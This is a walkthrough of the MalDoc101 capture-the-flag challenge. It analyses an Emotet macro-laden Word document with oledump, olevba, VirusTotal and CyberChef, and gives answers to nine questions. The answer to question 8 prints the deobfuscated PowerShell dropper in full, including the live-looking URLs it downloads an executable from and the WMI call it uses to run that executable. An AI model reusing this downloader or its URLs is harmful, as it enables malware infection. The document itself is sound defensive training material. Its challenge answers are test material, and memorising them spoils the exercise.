MalDoc101

Overview

Room link: https://cyberdefenders.org/blueteam-ctf-challenges/maldoc101/

This is the checklist for macro-based malware static analysis.

- file
- oledump
- olevba
- VirusTotal

We are given sample.bin. Upon running file, we see this information.

sample.bin: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 22 23:12:00 2020, Last Saved Time/Date: Wed Jul 22 23:12:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0

What is Composite Document File? This type of file is used by many document formats like doc, xls, ppt, etc. These file formats support macro, and they can be analyzed using oledump.

Upon running oledump, this is the information we get.

$ python3 oledump/oledump.py sample.bin 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7119 '1Table'
  5:    101483 'Data'
  6:       581 'Macros/PROJECT'
  7:       119 'Macros/PROJECTwm'
  8:     12997 'Macros/VBA/_VBA_PROJECT'
  9:      2112 'Macros/VBA/__SRP_0'
 10:       190 'Macros/VBA/__SRP_1'
 11:       532 'Macros/VBA/__SRP_2'
 12:       156 'Macros/VBA/__SRP_3'
 13: M    1367 'Macros/VBA/diakzouxchouz'
 14:       908 'Macros/VBA/dir'
 15: M    5705 'Macros/VBA/govwiahtoozfaid'
 16: m    1187 'Macros/VBA/roubhaol'
 17:        97 'Macros/roubhaol/\x01CompObj'
 18:       292 'Macros/roubhaol/\x03VBFrame'
 19:       510 'Macros/roubhaol/f'
 20:       112 'Macros/roubhaol/i05/\x01CompObj'
 21:        44 'Macros/roubhaol/i05/f'
 22:         0 'Macros/roubhaol/i05/o'
 23:       112 'Macros/roubhaol/i07/\x01CompObj'
 24:        44 'Macros/roubhaol/i07/f'
 25:         0 'Macros/roubhaol/i07/o'
 26:       115 'Macros/roubhaol/i09/\x01CompObj'
 27:       176 'Macros/roubhaol/i09/f'
 28:       110 'Macros/roubhaol/i09/i11/\x01CompObj'
 29:        40 'Macros/roubhaol/i09/i11/f'
 30:         0 'Macros/roubhaol/i09/i11/o'
 31:       110 'Macros/roubhaol/i09/i12/\x01CompObj'
 32:        40 'Macros/roubhaol/i09/i12/f'
 33:         0 'Macros/roubhaol/i09/i12/o'
 34:     15164 'Macros/roubhaol/i09/o'
 35:        48 'Macros/roubhaol/i09/x'
 36:       444 'Macros/roubhaol/o'
 37:      4096 'WordDocument'

The numbers on the left in the "stream" number. Stream is just the term for each building block making up the file. I think the middle number represents the size of the stream, and the string represents the stream name/directory. The flag M or m indicates that the stream contains macro codes.

To see one of the stream (here, it's #13), we can use the command below. The flag -s is for "select", and -S is for taking the "strings" only.

$ python3 oledump/oledump.py -s 16 -S sample.bin 
Attribut
e VB_Nam
e = "rou
bhaol"
|0{F
7B023C4-
B78E-420
9-9503-5
004D4325
5AC}{575
DE6EB-8D
J153-8C
58-4FAD3DCE
L77}
dG lobal
oFalse
Creatab
Predec$la
BExpose
0Templa
teDeriv
Customiz
0{F7B023C4-B78E-4209-9503-5004D43255AC}{575DE6EB-8D5E-4153-8C58-4FAD3CE32577}

Other than oledump, we can also use other tools to achieve certain goals. For example, we can do general analysis using olevba.

Here, we can see stream names such as Macros/VBA/roubhaol. We can also analyze what's going on in the file, like potential macros and their description.

Don't forget to check the hash of the malware and search it on VirusTotal.

$ sha256sum -b sample.bin 
d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee *sample.bin

Now, moving on to answer the questions.

1. Multiple streams contain macros in this document. Provide the number of the highest one.

There are three streams containing macro: #13, #15, #16.

Answer: 16

2. What event is used to begin the execution of the macros?

We can run the command olevba sample.bin | grep -i "exec", expecting somewhere in the output there is a mention of something related to execution.

Answer: Document_open

3. What malware family was this maldoc attempting to drop?

We can check VirusTotal for this. The file has been analyzed by other researchers before, and they get to put labels according to their findings. One such label describes the family of the malware.

Answer: emotet

4. What stream is responsible for the storage of the base64-encoded string?

I think the question is referring to this stream, which contains a big chunk of base64-encoded data.

We can lookup the stream named Macros/roubhaol/i09/o on the stream table provided by oledump and obtain the stream number.

Answer: 34

5. This document contains a user-form. Provide the name.

Same solving method as #2. We can run olevba sample.bin | grep -i "form" and get this result.

All of them have something in common, which is the roubhaol string. We can assume that that's the name of the form. We can confirm it by searching it again (notice the .frm).

Answer: roubhaol

6. This document contains an obfuscated Base64 encoded string; what value is used to pad (or obfuscate) this string?

Again, this is referring to the same stream as question #4 did. We can assume that the repeating sequence of characters must be the padding.

Answer: 2342772g3&*gs7712ffvs626fq

7. What is the program executed by the Base64 encoded string?

Continuing the previous question, we can unpack the base64 code by removing the padding first and then decoding the rest using CyberChef.

We can clearly see that this is a command to run powershell on another base64-encoded script.

Answer: powershell

8. What WMI class is used to create the process to launch the Trojan?

We can further try to deobfuscate the encoded script. Using the CyberChef recipe I learned from here, we get the original, readable script.

Now, we can pass it to Gemini to rename all the variables.

# Set TLS protocols to allow download from modern HTTPS sites
[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'

# Define the local path where the file will be downloaded.
# $env:userprofile is a system variable (e.g., C:\Users\Username)
# The filename will be '337.exe' in the user's profile directory.
$downloadPath = $env:userprofile + '\337.exe'

# Create a new WebClient object for downloading the file.
# The obfuscated string combines 'new-object' and 'Net.WebClient'.
$webClient = New-Object Net.WebClient

# Define a list of URLs to try. The original string was split by the '*' character.
$downloadUrls = 'https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/', `
                'https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/', `
                'http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/', `
                'http://holfve.se/images/1ckw5mj49w_2k11px_d/', `
                'http://www.cfm.nl/_backup/yfhrh6u0heidnwrwha2t4mjz6p_yxyu390i6_q93hkh3ddm/'

# Iterate through the list of URLs
foreach($url in $downloadUrls) {
    try {
        # Attempt to download the file from the current URL to the defined local path.
        # The obfuscated method name is 'DownloadFile'.
        $webClient.DownloadFile($url, $downloadPath)

        # Check the size of the downloaded file.
        # The obfuscated cmdlet is 'Get-Item' and the property is 'Length'.
        # The size check (>= 24751 bytes) is a common way to ensure the download was successful
        # and didn't just get a small error page (like a 404).
        If ((Get-Item $downloadPath).Length -ge 24751) {

            # If the download is successful and the file size is sufficient, execute the file.
            # The obfuscated class/method is [wmiclass]'win32_Process'::Create()
            ([wmiclass]'win32_Process').Create($downloadPath)

            # Exit the loop after successful download and execution.
            break
        }
    }
    catch {
        # Catch errors (e.g., URL not reachable, file not found) and continue to the next URL.
    }
}

Near the end we can see a class named win32_Process, which is a class that can launch a new process.

Answer: win32_Process

9. Multiple domains were contacted to download a Trojan. Provide the first FQDN as per the provided hint.

As we can see from the script on question #8, some URLs are listed. The first one has the FQDN "haoqunkong.com".

Answer: haoqunkong.com